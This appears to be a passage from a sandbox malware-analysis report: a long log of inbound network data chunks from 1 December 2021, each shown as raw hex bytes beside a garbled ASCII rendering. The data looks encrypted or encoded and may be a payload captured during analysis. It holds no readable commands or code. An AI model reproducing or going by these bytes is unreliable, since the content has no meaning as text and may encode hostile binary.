db a3 f4 c2 69 29 5c 84 ff ec f7 78 5f eb 54 2a a9 5d 4e 93 95 96 c9 f4 79 a9 ee 27 e7 62 2e db dd 8c d1 9d 5c 0f 9b Data Ascii: NB99c( _6.5^&Zmmveq$V3S}EdRM'`*<N}|H^=YzF{j)MGUr9':5{T :aY# ^/;ke&,q>5-E)Axgi)\x_T*]Ny'b.\
2021-12-01 15:23:14 UTC	478	IN	Data Raw: 76 45 7f 28 32 6e 74 08 09 ad 5c 97 d8 dc e0 a7 1e 50 57 f0 1b 79 1b fd fa 8e 48 b2 60 73 a6 b8 31 f5 0c 5a d1 01 06 d9 ab 0f cf 58 08 a8 e9 5c 87 ae 8e e9 b7 f0 00 90 6f 01 65 e5 4f 8b 81 bf 19 a1 20 1f 01 ff 41 a2 ce 43 74 e3 af 10 0e b8 ac d6 a7 16 61 09 69 a5 1c df 61 20 d5 77 94 47 99 25 9e 76 da e3 e8 89 5c 5c f4 ea 06 0e 9b 21 d8 48 55 ed d0 ad 18 3b df 5f b2 68 9c c8 1e 46 cc f8 a0 4e 20 d9 9b f9 12 f9 e2 bb 43 c8 91 74 66 3a 27 0e 1b 9a f6 07 db a7 9d 0d da e6 c6 cb 90 fd 6f aa f4 4d b8 eb 5e 52 2d 2b 39 7f 2d 09 87 43 66 3c 22 bc c3 87 6b e2 2b 34 bc 7b 9d 45 dd 79 7f 62 2d 1a bf 33 f5 b4 2f 16 2d 20 f1 4b f2 07 72 7e 33 a9 6e 58 83 fe af 38 c7 2a ec 08 c6 27 99 32 b8 f4 25 ff 1a f3 56 3d 8a aa 2a c3 0a 7b 8d bd c3 10 da 74 79 88 e4 e6 ca 5c 84 Data Ascii: vE(2nt\PWyH`s1ZX\oeO ACtaia wG%v\\!HU;_hFN Ctf:'oM^R-+9-Cf<"k+4{Eyb-3/- Kr~3nX8*'2%V=*{ty\
2021-12-01 15:23:14 UTC	482	IN	Data Raw: 07 fe b0 c6 0f 19 85 96 c0 47 01 e9 ef cc 95 cd ba 2d 65 78 69 a0 c7 a4 23 aa 5c 1a 66 7b 4f bf 56 48 1a 84 1c e3 7c 85 da 3a ea 40 7c 1b c9 af 8a ba 92 a6 3a b5 6c 66 30 53 49 ea c4 36 4d 6b 1c 05 d3 24 78 27 1c 21 af ff 86 96 73 26 45 43 0a ab 67 96 bf ce b6 14 3f 82 65 2b c2 e0 d7 e6 67 3b d2 b6 46 bc 06 d4 96 56 bc 9e c6 fe b2 34 fe d6 19 e2 ff 6a 4d 30 ad 6c 55 2c 58 c7 e3 8c c6 ae ed 38 ab 01 10 68 61 46 d8 e8 91 a8 47 e3 0e 4c 1d c7 3a 0b bc 60 fe b3 1d 4f f9 15 1e a0 5c 32 c9 85 2e cc 1f bf 7a 6a 9c 07 2c 6c 40 fd bf 01 a1 5f 0f 3a 81 52 9c d2 8a 32 b4 51 1b 4d b1 4c 2a 54 50 f0 29 7b 0c 23 ba c0 4b d7 5a 5a f3 16 36 e4 ef 19 00 24 69 bd 22 5d 5f ac 4d 04 5c b4 85 34 03 38 c8 25 36 ee 9a 01 42 7d 62 ed fb 6c 57 6b e0 cd f8 47 7b f8 9d 3a e7 0a ed Data Ascii: G-exi#\f{OVH|:@|:lf0SI6Mk$x'!s&ECg?e+g;FV4jM0lU,X8haFGL:`O\2.zj,l@_:R2QML*TP){#KZZ6$i"]_M\48%6B}blWkG{:
2021-12-01 15:23:14 UTC	486	IN	Data Raw: 81 7d 46 ab 9f bd 08 d5 d1 d2 cb 51 80 be 0d 53 13 a2 f9 8f 30 29 b1 29 3c d4 6e f1 a2 f3 96 91 bc d4 b2 d3 93 38 e2 90 dc 80 57 24 59 c0 0a 5b 8f a6 d7 f6 e7 7e 85 a0 ec 04 0d 3b 24 74 6d 0c f3 fa 90 52 df 20 83 45 20 5f 49 16 8b bd 1d 49 14 ce 8d 8f 6a 70 ef 4c dd 0e 10 29 95 d8 e3 1c f0 f6 37 1b ae 4d 0a 16 00 b5 c9 8f 07 74 e5 d2 1f 41 22 a6 96 8a 5d cf da 30 5c f8 90 c7 08 47 ff dc f5 0d 07 f1 3b 83 60 17 8f 36 c7 37 be 06 1d 91 68 ed 45 d0 fb f5 e7 28 bc 7b d9 02 46 7d 72 b8 ed 8c dc 7b 61 22 e4 26 3e 75 7c 48 8c cf 29 76 8b 71 f6 81 96 75 f2 94 9b 3f 1f 25 ca 30 4e da d3 a4 2c e2 b6 d9 df b1 d5 f2 9c 09 31 76 a5 38 72 04 58 4e 49 cf e4 c3 9c 92 8c 8e 01 6e 7c 92 5c f4 f2 5d 28 27 c5 0f fc 3a 05 57 65 31 d3 38 70 0d 49 71 8d 82 f2 34 c6 3f 8a 19 4e Data Ascii: }FQS0))<n8W$Y[~;$tmR E _IIjpL)7MtA"]0\G;`67hE({F}r{a"&>u|H)vqu?%0N,1v8rXNIn|\](':We18pIq4?N
2021-12-01 15:23:14 UTC	490	IN	Data Raw: 57 33 b2 75 a7 86 1e 73 9d 6b bc c8 6d ad aa d7 b6 dc 48 61 39 f7 b2 d5 ad 6f fb 9a ae 24 44 f6 68 9d 09 68 e6 3e f0 dd 5d 24 4c 93 2c 97 23 f6 8b d0 ae bf 05 e0 dc 7b a3 fb 0c 66 b1 3d 00 ab b0 e0 52 80 d9 3b 0e 45 46 46 04 96 71 24 06 05 14 e5 23 43 1f 7f a9 f8 95 1b 1f 51 7e c8 53 bb 42 90 11 bc dd ce 04 db 39 6f b9 73 29 49 f7 54 70 35 b2 6f 54 2c e0 87 43 c3 02 d6 b0 4a 1b 84 83 06 43 af 61 6e 37 5b 98 a7 1c 7b 07 6d e6 8b 07 2f db 33 7d 65 b4 de 68 78 43 e6 2a 7e 27 63 71 ac 75 14 0a 0f 5a b7 e1 32 7f 30 f8 eb 80 05 9b 59 94 5f 48 62 ed a9 82 1c 27 4f 3a 1a 49 1b de 5a fc 98 5b 99 9c 79 d6 40 65 de c1 25 e9 bf 7f 1a 6d 42 12 47 a0 f4 1a 6f 23 c1 67 b6 fb a7 46 b6 82 e8 a3 15 86 74 29 ca e2 e0 50 a3 df e3 82 d8 56 cc d7 0c 0b fa 86 2f e1 1e 8b 4c 03 Data Ascii: W3uskmHa9o$Dhh>]$L,#{f=R;EFFq$#CQ~SB9os)ITp5oT,CJCan7[{m/3}ehxC*~'cquZ20Y_Hb'O:IZ[y@e%mBGo#gFt)PV/L
2021-12-01 15:23:14 UTC	493	IN	Data Raw: fb 1e 8e d2 7f 94 54 09 06 2b f0 c6 85 32 78 76 58 78 c9 d7 92 5b 10 a2 38 8b 90 5c 3e aa dc 80 af 5d 45 07 d8 9c 51 47 15 d5 f7 c9 2a 04 84 e5 04 26 1c 7a 0f 5d 0a 0e cd b9 94 75 ce c1 8c 60 9b b4 9e a9 cc b5 87 44 2e 46 0e 48 61 49 76 aa 2f 21 d3 ba 66 ab 58 b8 93 f2 40 0f b5 30 84 61 bc bf f3 ea e9 dc 3c 78 ea 89 41 cc 35 5e 0e 2d fb 03 ab aa 3f c4 10 3b f9 22 1c 4b c8 52 73 74 6e 33 0b ca 28 58 7d 81 ce 40 5b 63 32 73 7e 74 ae 44 a9 09 c1 44 4b 1b e9 55 1a e8 b5 4b 61 c5 6b 42 5f 50 d5 88 46 88 cc cb c6 ce 54 89 3e 7e fe ed 16 8b 36 42 30 56 fd 08 76 c4 73 f6 f3 58 0d 44 68 22 96 48 05 c7 b6 a2 52 5b 56 09 44 43 d1 dd 6c ac 43 ab 43 46 77 3b 85 29 2b 0e a0 7c 59 2c ed e9 6d 66 0a c6 d9 25 8d e8 83 4c ed 82 6c ae 2d 62 8e 31 99 fc 22 3d f2 ad fe e9 a9 Data Ascii: T+2xvXx[8\>]EQG*&z]u`D.FHaIv/!fX@0a<xA5^-?;"KRstn3(X}@[c2s~tDDKUKakB_PFT>~6B0VvsXDh"HR[VDClCCFw;)+|Y,mf%Ll-b1"=
2021-12-01 15:23:14 UTC	498	IN	Data Raw: a9 e6 66 e1 16 3e 7e 07 ba ad 40 2f bb dd 0b 23 dc 24 66 7e 4b 1f 28 09 dd 93 b2 64 dd b2 df fe 15 9f 9b 1c 0e b0 b2 27 ea eb a5 ba 12 d1 d7 b9 f6 82 0a 83 da a0 d8 a9 8a da 1b 56 79 0f b4 8a 03 54 ac 48 34 9c 01 22 c3 b7 68 a3 0f b8 7d 52 b7 3a d5 18 22 27 e5 f0 f1 5a ef a5 5d 67 d6 8b d2 f0 89 09 80 9d 09 ac 47 80 7d 1d bf 23 b6 a4 c1 55 43 ec b8 f5 43 e4 ea a3 40 a0 70 4c 6c 7e 0a 2f 97 e1 07 1c ab 8d 9f a0 f9 07 ed d0 70 02 cf a9 ef 3f 6d ee af 27 65 45 a5 71 e8 02 ac a8 2d 7a 36 f4 c2 db b8 f9 58 35 96 36 56 35 df 0f fb 04 00 69 b1 8e 58 aa 3f 26 d7 8d 49 7c 2a 94 26 5c 2c f2 84 2a 93 e7 f8 a9 a1 60 0c fd 2b 39 a0 fc cb 88 48 72 39 75 72 8a 26 08 55 2a d1 04 16 39 95 a7 36 01 f6 8b e6 7b 4a f5 88 19 8b 03 d5 0a 5b 17 0b 80 68 9e 9f 99 94 30 bb 79 b1 Data Ascii: f>~@/#$f~K(d'VyTH4"h}R:"'Z]gG}#UCC@pLl~/p?m'eEq-z6X56V5iX?&I|*&\,*`+9Hr9ur&U*96{J[h0y
2021-12-01 15:23:14 UTC	502	IN	Data Raw: da ff b5 22 5d 46 e5 9a 2b c9 35 e2 61 50 c0 be c9 54 c0 be 99 dc 70 f5 ac 8c 5d 46 e5 9a 2d ce 80 1d d0 e6 3d f6 21 b0 ff db ed ae f0 36 12 0a 98 5a f7 c7 6a e6 73 7d f9 cc b5 22 46 8c 5d 46 fe 59 59 3c 03 64 b8 aa a7 ff af 13 e3 95 b3 1d cf 63 27 bf 5a be cf 63 75 82 46 8c 55 32 36 64 b6 a5 8c 3c 1d a6 34 5f 52 aa e9 a4 17 97 be b9 5f 4b 6b 69 01 5f 3d f6 2b c9 3b f1 db 81 80 1d c3 45 7a 0e 79 8c 48 91 e8 22 46 8c 52 aa e6 1d cf 63 27 bf 5a be cf 63 75 82 46 8c 55 32 36 64 b6 a5 8c 3c 1d a6 34 5f 54 af 77 87 ca d7 1c 23 d6 f5 ad 0e 6c eb 89 b4 d3 6d 07 6e d0 e6 64 d7 16 14 7d 96 27 bf 5a be 99 dc 61 50 c3 45 6b 69 17 97 f7 c7 3d f6 2a 46 ac 8c 48 91 a6 7d f7 c7 26 3c 01 5f 2a 46 da ff c4 c8 a1 f0 52 aa e9 a4 0d 7e 77 87 cd 5e e8 22 54 af 7c 13 ad 0e 74 Data Ascii: "]F+5aPTp]F-=!6Zjs}"F]FYY<dc'ZcuFU26d<4_R_Kki_=+;EzyH"FRc'ZcuFU26d<4_Tw#lmnd}'ZaPEki=*FH}&<_*FR~w^"T|t
2021-12-01 15:23:14 UTC	506	IN	Data Raw: cb be 88 a6 4c 19 ad 4d 2f e1 a1 f6 75 6a d6 4b 29 6c db 17 a7 71 48 e9 94 38 59 67 6f 3c 43 22 32 5a be 31 d8 fb 91 c8 ed 43 3a c1 7f fc 6b 5e f7 e2 2c 51 17 84 18 1e 16 c5 74 35 dc 20 10 ff e6 59 07 bc 8f 07 55 f2 00 61 6b d1 53 99 e7 2f e8 8e 7a a6 46 28 7a 92 70 7d ad 72 c1 24 0c 9b da a3 ce b9 17 c3 7e 48 aa cb 62 9a 64 93 f6 79 b7 3b ca dc 3e 81 9a b1 22 d5 48 4a ac 27 85 33 e7 10 3f 7b ab 7f a1 9c 5e aa bd 7e 22 02 d8 dc 3e 67 65 49 2d 3b c8 31 e1 4e 99 72 c3 da c6 46 b5 a3 cc b1 21 d7 4e f7 fe 14 36 78 31 2b fe 3d c1 00 ea 3b c7 40 4b 12 3c 74 c9 57 02 1d 93 36 51 df be 4a a3 1a 2b 22 07 89 81 43 30 8a 02 39 d9 ab 3c a0 5b 8e 74 34 6a 21 85 69 51 97 e2 a8 b7 90 73 eb 9d 51 1c b7 13 df b8 09 47 7b a3 1c 11 f8 78 60 fc f9 fd 4a a7 82 13 f5 f3 8e 70 Data Ascii: LM/ujK)lqH8Ygo<C"2Z1C:k^,Qt5 YUakS/zF(zp}r$~Hbdy;>"HJ'3?{^~">geI-;1NrF!N6x1+=;@K<tW6QJ+"C09<[t4j!iQsQG{x`Jp
2021-12-01 15:23:14 UTC	510	IN	Data Raw: f5 f4 0c cd 1a 28 7d a0 5a 88 1d 90 62 e4 04 d1 7c 25 b6 93 c9 61 ac b9 d8 cf 8f f6 a1 c5 96 60 19 a9 c8 e7 5b 74 43 30 e1 a5 56 81 04 d2 77 b2 0f b6 29 f1 3c 46 f0 03 10 30 39 d9 18 2c 17 a2 27 8a 7b a4 3c 46 b0 a3 c1 75 ae a4 5c f6 59 09 60 f8 46 b9 28 75 7e 2c a5 ce 3a 5a 6d 5a 75 b6 1a 2a ec 18 bb 05 f3 89 26 08 7b a5 78 3d 8c 08 83 91 a2 47 6d 5a e4 2c 19 a8 c8 e6 5f 7f a1 c4 fa 7b bb 05 4b 2d d4 c4 da cb 53 19 9e 5a 44 b4 52 99 36 57 d5 41 da cc 0e 33 17 a4 ba 9c de 3a dc 37 4d 2d 6c d8 60 fe cb 6a 6c d8 78 3a 14 3c 01 6c 81 93 af 20 77 b4 f2 08 bb 02 a0 5d 7c 20 1f 98 70 c6 ef 80 07 5d 54 9c 6e c3 47 3d 0c c9 a6 4f c9 66 3e 4a 4c a9 d6 c7 85 98 98 68 5b 73 cf 51 82 10 a7 cd c4 fa dd b4 2a 74 7d a4 02 d0 8a 05 0e 32 13 bf 04 d5 43 37 c2 f1 ac be bd Data Ascii: (}Zb|%a`[tC0Vw)<F09,'{<Fu\Y`F(u~,:ZmZu*&{x=GmZ,_{K-SZDR6WA3:7M-l`jlx:<l w]| p]TnG=Of>JLh[sQ*t}2C7
2021-12-01 15:23:14 UTC	514	IN	Data Raw: a3 e1 90 47 e7 99 dc 05 8e bb 31 d9 9b 09 74 fe be 63 55 33 3a a6 7d 97 30 e3 95 d3 8a 97 d7 76 e3 19 9c 65 bd 4c 9b e0 e9 cc dc 05 8e 17 97 d6 12 4e a0 6f 94 68 e1 91 2f ff db 80 fa 59 3c 72 1d a6 7d 97 31 28 41 01 b9 f4 40 7c f5 02 e2 12 ec 86 2c 4a 70 65 5a bf dd 06 ec 2d 28 31 d8 fb 37 85 aa 86 ca 8d be b8 4c cb 59 3c 73 7d 96 54 49 22 32 5b a7 d7 77 86 ca cd 5e c9 b2 91 c8 d3 88 c9 54 af 13 8d be b8 4f fd d6 f4 a5 34 5f 4a 73 c7 4f 23 b5 22 32 5b a4 e0 0e 01 ba 2d ce e0 eb db 81 a0 6e f0 36 65 b4 26 3c 73 7d 96 55 33 33 b3 1d a7 11 d6 f5 c3 ab 59 3c 72 14 33 dd 87 41 2a 46 8d 50 b1 18 18 f4 be b9 2d 23 5d 46 8c 3c 73 7d 97 3a ac 8c 3c 73 7d 96 54 42 36 64 d7 77 87 af 12 e7 07 6e f1 55 b4 a0 6f 9e 11 88 30 b8 c2 c3 44 6a b0 96 55 32 5a be b8 47 35 e2 Data Ascii: G1tcU3:}0veLNoh/Y<r}1(A@|,JpeZ-(17LY<s}TI"2[w^TO4_JsO#"2[-n6e&<s}U33Y<r3A*FP-#]F<s}:<s}TB6dwnUo0DjU2ZG5
2021-12-01 15:23:14 UTC	518	IN	Data Raw: 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 48 e1 90 46 8c 3c 73 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d4 d0 e6 1d a6 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 85 4a 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d bc 14 0f 83 a5 fa 4f 23 b5 22 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d5 02 e2 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be bb 71 78 09 74 ff db 81 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d bc a4 78 09 74 ff db 81 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d bf db 81 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b Data Ascii: Kdw,HF<s}U2Z,Kdw,Kd}U2Z,Kdw,KdwJU2Z,Kdw,KdwO#"2Z,Kdw,Kd,Kdw,Kdwqxtn6dw,Kdwxtn6dw,Kdwn6dw,K
2021-12-01 15:23:14 UTC	522	IN	Data Raw: e8 22 73 05 31 60 cd 1f d3 55 88 31 99 0f f7 7e e7 60 13 55 da ff 9a 8c bc 15 92 0a b8 fe e3 6a 19 78 76 ec 2c 0a 81 7c ab 09 35 9a 43 bf 3b b0 45 8a 8e be 46 52 51 c0 be f8 99 a0 cf 63 14 41 54 15 6d 91 2c e9 4c 9b a0 19 40 c5 4a d7 0f 87 15 92 0a 25 c6 74 00 22 ed b0 7e 18 58 6a 9e c8 d2 aa c9 00 67 a0 91 2c 8e a9 04 a6 0a 2a fe 59 7d e1 7c a9 04 a6 ae e9 1d 59 c3 9a 1e c0 be f8 99 a8 23 b5 63 1b f5 78 f6 ba 4b f1 50 a5 bb 46 50 1d a6 3c 04 23 0f 83 e4 cb 2d 77 78 f6 9a 3b 19 9c 25 69 e0 af 13 cc 92 1f 11 77 78 ec 27 57 37 a6 0a 42 3a 6e b1 6f ef 09 74 be 6a 62 6b 96 ab cf 8c d4 f0 77 54 43 a4 87 50 69 f1 50 a5 bb e2 ff 7a f1 47 c1 17 7f 9b a0 bd da 5e c8 93 1e fc 41 8b 46 73 82 4a 1b 2a b9 d2 3e 29 2c b4 5f b4 c8 57 ba 7f 10 fa b1 c0 b8 42 7d 69 9b 85 Data Ascii: "s1`U1~`Ujxv,|5C;EFRQcATm,L@J%t"~Xjg,*Y}|Y#cxKPFP<#-wx;%iwx'W7B:notjbkwTCPiPzG^AFsJ*>),_WB}i
2021-12-01 15:23:14 UTC	525	IN	Data Raw: e2 07 cd a1 0e ff ff 33 8e 11 77 79 6f 04 0f 4f 66 57 c8 2d 15 e1 78 09 35 8a 2b 71 b4 f5 4f 23 f4 93 dd 25 45 f4 bf 7e f0 65 0a 09 8a d4 68 09 a4 3d 7d 69 9b 3a fa a7 ff 9a 37 e3 2d 1e 7d 1b a1 b1 cb 55 91 37 19 63 33 35 b1 48 6e 0e e3 2c a3 21 f5 49 eb 56 6f c6 25 ba ee 56 58 01 8b ec a1 f0 77 54 a7 5c 3c 8d 41 87 47 5c 93 32 a4 9b 3b 19 44 c2 48 6e 0f 58 6f 9b e1 d1 0f 57 8f 1b f4 cd 5e 89 67 5b e2 ec d2 14 a7 17 c4 98 a5 04 04 1c cb 85 ef 38 96 aa 5c 34 b7 27 fe 3e c4 70 29 91 45 0a b7 f4 6c 48 6e 0e ff 12 e2 40 2d 31 26 d8 e6 f5 22 77 0c 04 18 c5 52 42 82 63 32 fe e1 70 a0 e3 95 93 1e 00 7e e7 61 af f9 24 64 87 50 5b a5 c7 a7 1b e4 93 32 a5 26 05 81 a0 2f b4 2c f3 59 69 e9 a4 39 3f e3 36 9b 1e 28 4a 7e 4b 49 eb 57 d3 33 35 0a b3 96 aa 78 d5 28 a9 04 Data Ascii: 3wyoOfW-x5+qO#%E~eh=}i:7-}U7c35Hn,!IVo%VXwT\<AG\2;DHnXoW^g[8\4'>p)ElHn@-1&"wRBc2p~a$dP[2&/,Yi9?6(J~KIW35x(
2021-12-01 15:23:14 UTC	530	IN	Data Raw: f4 83 26 07 e7 67 d4 0f 7c ee 5c 2b 3d a3 7e e0 43 8e 9d a6 f6 4d 5b ca 81 96 de 0d 90 c5 4f 57 c1 c5 aa f2 b0 69 9a a6 12 e2 eb fc df 6b 2c c6 35 a7 76 06 2c c8 d1 6b 9d a6 f6 4d 5b ca ee da 07 e5 65 a5 07 c6 25 4e f5 49 c8 92 c0 b6 e0 85 aa 87 50 5a 5f ca dc 8f c7 25 a6 09 b4 24 c8 2d 31 e0 e6 1e a3 90 ad fa 17 94 58 fc df 93 46 70 b0 1d d4 1b 55 6a e5 92 0e 8b a9 5c 48 6d 2b 42 8c 49 14 0b 01 dc f8 0f 08 0e ff 2e 37 0f 73 3d 7d 9e 2c c0 5a eb 22 cd a0 97 36 8c c8 87 24 d3 28 cc 23 4a 6d 76 ec d8 af 98 86 6c 60 c5 0f 08 d6 80 dd 02 1d 59 ca f5 2a 1c cf 26 b7 2f 96 de e1 dd 0d 81 5e 32 57 df 7f ce 6a 0e 45 87 ff 24 c8 d5 df 63 b9 69 ed 5e 88 ba a7 ba 24 67 af 56 39 18 5c 4a 62 90 45 02 b7 ac 80 5d cd a2 36 ef b3 1d a6 84 ce 1d e3 1c 01 d6 91 fa b0 f2 3b Data Ascii: &g|\+=~CM[OWik,5v,kM[e%NIPZ_%$-1XFpUj\Hm+BI.7s=},Z"6$(#Jmvl`Y*&/^2WjE$ci^$gV9\JbE]6;
2021-12-01 15:23:14 UTC	534	IN	Data Raw: 56 b4 e0 38 d9 7c 53 1b 35 e2 53 14 1f ab 49 2d d2 eb e9 9d fe 59 7c 2a 52 aa c7 76 0c fb 91 af c7 4f 23 b5 2e 50 e4 23 dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 58 82 4a 96 15 1f 68 bc 4c 70 0a 09 75 81 49 d7 77 c6 f6 52 c2 d3 e4 7c 4a cf 39 2c 78 f6 ba bc ee d9 7c 53 3d f6 50 2e 50 a5 fa 4d a7 ff 9a d5 e6 a5 ef c6 cd 1f 79 74 fa b0 b6 2c 2f e3 6a 82 22 73 46 9c 0c ae 51 1b 4d 95 87 af 13 8d 8f c3 45 0a f7 38 96 aa 78 09 74 ff eb a9 04 e7 9e 96 aa 78 f6 45 4a 1b 62 8f 3b 1a e1 6f 72 99 35 21 b0 d7 4d a9 6c fb 58 dd df d2 b1 d8 c9 ab f6 65 98 b2 9b a0 bc 70 4d e1 6f f9 e0 e6 1d e7 4d c6 75 7d 69 9a ad e6 e2 ec a6 46 64 d7 36 ee a1 48 6e 0f 9c 19 74 ff 9a 65 5e 70 0a 09 54 40 95 d2 aa 55 f6 fd 29 3b 7b c8 3a Data Ascii: V8|S5SI-Y|*RvO#.P#,Kdw,Kdw,KXJhLpuIwR|J9,x|S=P.PMyt,/j"sFQME8xtxEJb;or5!MlXepMoMu}iFd6Hnte^pT@U);{:
2021-12-01 15:23:14 UTC	538	IN	Data Raw: 67 8d 8d f7 db ca 5c 95 d2 eb a9 80 8f 3c 63 de ca 5c e1 ee 30 49 6f f0 1e 5d 46 a8 f9 4c 43 8e b3 96 03 37 27 34 9c 64 d7 77 13 1c dc 0c 70 f5 83 8f 4f 99 1c a8 41 5b 1f f4 74 ac 73 65 d1 ae 1a e6 09 ff c3 03 ef 7b 9d 6d 76 42 09 84 ac 76 8f 94 06 bf fb 5a 7d 96 55 32 da 6d 91 d8 71 bb 31 d8 fa cb cb a6 6d e5 93 b9 fe dd 45 51 76 24 44 0e ff 24 36 a2 9b f9 8f 4e 72 f9 1e 2b 1b a2 a5 71 a0 e5 68 6a b0 c5 4a 92 89 e9 41 8b e2 4d 9b 9d 12 57 0c 03 39 65 a5 05 96 29 2c b7 62 59 c4 9d 6d a0 e5 ca df ce 6a f7 b9 d4 85 91 7f e6 ee 0a b8 e9 54 f2 b2 98 2f 23 c0 85 a2 98 aa f2 b2 9e 1c d3 30 6e 0f 7c ef 01 b7 db c4 43 d6 7e d6 7e 38 15 61 6b 99 a3 35 67 57 62 2d 32 1f 20 fb 5a 4e ed 25 f4 41 eb 59 40 bd b3 15 c7 b0 6a a3 7e cb d2 1b ec a7 bc b5 c9 a4 3d 7f 73 ac Data Ascii: g\<c\0Io]FLC7'4dwpOA[tse{mvBvZ}U2mq1mEQv$D$6Nr+qhjJAMW9e),bYmjT/#0n|C~~8ak5gWb-2 ZN%AY@j~=s
2021-12-01 15:23:14 UTC	542	IN	Data Raw: 0d 7e 59 20 3c 1b f4 80 2e a4 3d 7f 6b 3c fa b7 6a 6f 8f 8e c8 0e 4d 97 1e 1b f7 94 88 f5 41 ec a7 aa 47 84 e4 45 53 76 c7 c4 38 82 dd 79 ad 34 b6 66 23 4a be dd 6e 0c be 34 5f 0a ec cc b4 b0 1f cf 3a 37 bd f6 76 dc 8f 3c 8c 5f 28 a9 fb 2e 7d b6 4d e2 56 3f e7 ce 1e 20 a6 be 32 a6 28 cc fc dd e2 23 4a f2 3b b0 8c e5 f2 6e 30 66 04 6c b8 aa ed 42 09 21 20 ee f1 8b 79 07 ad 1a 4c 64 c7 c4 c8 92 c6 0e 5d a3 7e 43 5b 1e c0 55 cd a1 d1 f4 a9 c7 b0 69 4c 5d ae 6d 2b 44 78 f6 6d a0 86 dc 41 8d be f8 50 db e9 b4 29 a0 37 be e3 55 01 af f8 b5 dd a7 3e 91 0b 86 d3 90 bd de f1 fd 5d 46 cd 44 de 61 40 f4 24 6e a9 5e 08 c2 e7 cc 23 ad 85 52 ef 38 bf b0 62 9f 60 ed fd 29 dc 8f 3b b4 2b 1f 20 d1 25 31 fc 07 91 d0 6d 96 10 8e 92 c0 76 8f db d0 19 94 db 79 c9 df 5d cd 7e Data Ascii: ~Y <.=k<joMAGESv8y4f#Jn4_:7v<_(.}MV? 2(#J;n0flB! yLd]~C[UiL]m+DxmAP)7U>]FDa@$n^#R8b`);+ %1mvy]~
2021-12-01 15:23:14 UTC	546	IN	Data Raw: 4c 9b a1 c9 40 7d d6 cc d4 f0 77 8e 59 3c 73 7d ae 91 89 bf 0f 83 a5 fa 4f 23 b5 22 32 5a be b9 2c 4b 58 b2 df 8b b9 2c 4b 19 9c 64 d7 77 87 af 13 8d ff d1 f4 40 3d 7b 91 c8 d2 eb a9 44 97 d7 77 87 af 12 0a f6 45 02 8f a6 09 3d 91 a6 14 7d e2 40 29 cf 6d 6e b1 12 3a ae 1a 1e 28 32 3f 88 42 e3 f9 8f c4 c8 d2 eb e8 2a fe 59 7d 9f 8f b0 f1 d6 9c 16 60 9e 3d fe 5e c8 93 c7 43 95 a1 97 b9 45 78 7d c5 1e 20 2d ce e1 84 27 fe 51 c8 d2 eb a9 0c fb 91 d8 fa 4f 23 b5 20 2d ce e1 90 46 82 22 73 5c ab 09 35 c2 13 8d ff fb a9 04 a6 63 b1 18 58 a7 c7 4f 62 cf 87 af 52 b7 93 cd 1e 18 59 3c 32 47 8f c3 04 fb 7d 96 14 13 ad 0e 41 1a 8a 37 a6 64 4b 19 dc 34 1f ab 49 24 77 87 ee 27 9f eb e8 37 1b a1 b1 0d a6 7d d7 53 69 64 96 76 58 b9 6d 4f 9b e1 d1 49 24 37 a6 62 16 14 4e Data Ascii: L@}wY<s}O#"2Z,KX,Kdw@={DwE=}@)mn:(2?B*Y}`=^CEx} -'QO# -F"s\5cXObRY<2G}A7dK4I$w'7}SidvXmOI$7bN
2021-12-01 15:23:14 UTC	562	IN	Data Raw: 26 bf 6c bd 65 1a 1e 28 41 00 dd 86 2c 47 cd 03 81 2b 92 15 cd db f6 45 32 d9 88 74 74 0b 3c fa bb 74 fc 50 e5 11 7c 56 3f 2a 33 93 cf a0 ed be b8 ba fa c4 24 72 71 94 15 1b 49 51 2b 39 a9 8f d2 9e 6a 19 1f 43 40 f4 80 aa 88 3e 87 8a 51 2b 7e 17 9b 0e c1 7b 26 33 9b d1 1a e8 a7 b1 e8 a9 fb 2e 35 15 7a 0e 40 b7 5b 74 27 5f 26 e3 71 3d 7f 5b 72 1a 5b c8 da 17 14 0b 39 67 ab 4c 10 0d bd b5 d6 a8 09 84 62 5b b9 69 67 5f c0 4a d3 e6 6e 1b 55 77 0e f8 0f 80 1d a6 7d 36 e4 93 cd 5e c8 5b c7 40 7d 96 55 32 fe e1 13 75 d7 fe 51 7d 1d aa c2 48 c6 9b b2 7b 55 b1 f4 cb 0c 3b 7a 0e 41 e5 aa a2 8c fc df 48 ca 89 77 84 d8 05 0f c4 20 ee 1a d8 71 bb 6a b8 6c e8 dd 79 ea 72 12 cc f7 04 6c e5 e7 6c d0 3e f3 4f a8 d4 a3 36 39 14 e4 e7 60 bf bf d2 28 41 40 b4 36 0c eb 20 49 Data Ascii: &le(A,G+E2tt<tP|V?*3$rqIQ+9jC@>Q+~{&3.5z@[t'_&q=[r[9gLb[ig_JnUw}6^[@}U2uQ}H{U;zAHw qjlyrll>O69`(A@6 I
